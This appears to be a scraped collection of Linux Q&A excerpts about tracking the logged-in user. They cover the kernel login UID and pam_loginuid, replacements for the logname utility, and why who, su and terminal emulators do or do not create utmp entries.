Linux actually does have a concept of “login UID”. It's visible for each process as /proc/PID/loginuid. This information is tracked by the kernel, but it's up to userland to let the kernel know when a login takes place. This is normally done via pam_loginuid. Under the hood it's done by writing to /proc/self/loginuid. Linux's login UID follows process ancestry, which is not always the right definition but has the benefit of being simple.
Beware that if a process's login UID is 4294967295 then the process may change it. Init starts with the login UID 4294967295 (equal to -1 as a 32-bit value); this normally indicates a process that's not part of any login session. As long as the login process sets the login UID correctly (just before it sets the real UID from root to the user who's logging in), that's fine. But if there's a way to log in without the login UID set then the user may declare any login UID of their choice. So this information is reliable only if all the ways to run a process on the system go through a step of setting the login UID — forget one and the information becomes useless.
Experimentally, on a Debian jessie machine, all my long-running processes whose login UID is -1 are system services. But there are ways to run a process with login UID of -1, for example via incron. I don't know how many other ways there are; incron was the first I tried and it worked. On Ubuntu 16.04 machine, the pam_loginuid entry for lightdm is commented out, I haven't investigated why. Maybe Ubuntu's lightdm and incron should be considered security bugs, but the fact is that today you can't rely on the login UID working out of the box in major distributions.
See also Loginuid, should be allowed to change or not (mutable or not)?, which is about a kernel option to prevent root from changing the login UID. But beware that it's only effective after the login UID has been set to a proper value; if a user gets to run a process with the login UID still set to -1 then they can set it to whatever they want. It would in fact be safer to make init switch to a different value, say -2, and have pam_loginuid override that value; then -1 would never happen and -2 would indicate “unknown”.
|
The logname utility became unusable a while ago for many users, since it relies on something that has been broken intentionally due to security concerns, as discussed here. As I read the discussion, it is unlikely that the functionality is going to come back.
I lived with workarounds for a while, but now I feel that they start to fall on my feet, so I'm in search for a proper long-term solution and I'm surprised to see, that there does not seem to be much.
The solution most commonly linked to is presented here, but it originates from here where also a hint is present, that the proposed solution via the environment variable SUDO_USER is not portable.
Another proposed solution is to create a file containing the username and to write a bash alias or similar to emulate the logname functionality, but I wouldn't call this a proper replacement, at least since it assumes an amount of controllability regarding the environment that might not always be possible, better to say, in the least of cases.
The solution via who from here is interesting, but I could not find any information about if there are relevant reliability or portability limitations.
Apart from those approaches, the air is getting thin fast in this area, so I decided to ask here in hope for some new input regarding the topic and my thoughts so far.
|
A proper replacement for the `logname` utility? [closed]
|
First, who does not care about login shells, or anything such. It merely dumps utmp entries. You can have an entry for non-login terminals; for graphical sessions; for FTP connections (with a completely made-up tty "line" name); for just about anything.
Second, utmp entries are created manually – you only get an entry if the program which processes your login calls pututline(…). For example, sshd always does this, terminal emulators often do this (but not always), and su never does.
(Remember that su does not allocate a new pty, so it can't add an utmp entry either – otherwise you'd end up with multiple entries for the same tty, which can confuse a few programs.)
|
My observation:If I open a new terminal (gnome/lx):New /dev/pts/X is used
who does not lists these
First character of echo $0 is not -, so its not a login-shell.If I ssh into the same machine with the same userNew /dev/pts/X is used
who lists these
First character of echo $0 is -, so its a login-shell.If I open a new tty (ctrl-alt-Fxx)New /dev/ttyXX is used
who lists these
First character of echo $0 is -, so its a login-shell.If I run su -Same /dev/pts/X is used ( where su - was issued )
who does not list these
First character of echo $0 is -, so its a login-shell.Conclusion:Creating a new pty does not automatically create an entry in utmp (?)Question:If who displays the list of currently logged in users, then it should display entries for each login-shell (?). But it does not display entries of root user logged in from su -, why ?EDIT: Another thing which I can conclude at this point is: "It has to be a new pty/tty and a login shell, then only a new entry is created in utmp"
|
Is it necessary for a login-shell to create utmp entry?
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.